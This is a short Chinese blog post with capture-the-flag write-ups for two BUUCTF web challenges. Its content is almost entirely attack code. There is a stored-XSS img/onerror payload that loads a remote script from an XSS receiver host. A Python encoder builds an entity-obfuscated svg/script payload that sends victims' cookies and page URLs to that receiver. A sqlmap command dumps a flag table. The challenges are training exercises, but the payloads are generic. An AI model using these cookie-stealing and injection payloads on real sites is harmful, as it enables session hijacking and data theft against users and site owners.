# BUU XSS COURSE 1 & [CISCN2019 华东北赛区]Web2

XSS的题目没怎么做过，比赛基本上也没有（=_=），总结下今天做的两题

# BUU XSS COURSE 1

## 题解

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>


end。

# [CISCN2019 华东北赛区]Web2

1、储存型 XSS 与过滤绕过

2、SQL 注入

## 题解

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

output = ""

for c in in_str:
output += "&#" + str(ord(c))

print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")


md5截断验证用python脚本爆破，百度上挺多的。

sqlmap -u "http://6e5d7496-7b5f-4d94-b0e3-74ccf262a4d2.node3.buuoj.cn/admin.php?id=4" --cookie="PHPSESSID=8925446bf891203de8f1226880a9e296" -T flag --dump --flush-session --fresh-queries


posted @ 2020-07-24 15:55  Rabbittt  阅读(161)  评论(0编辑  收藏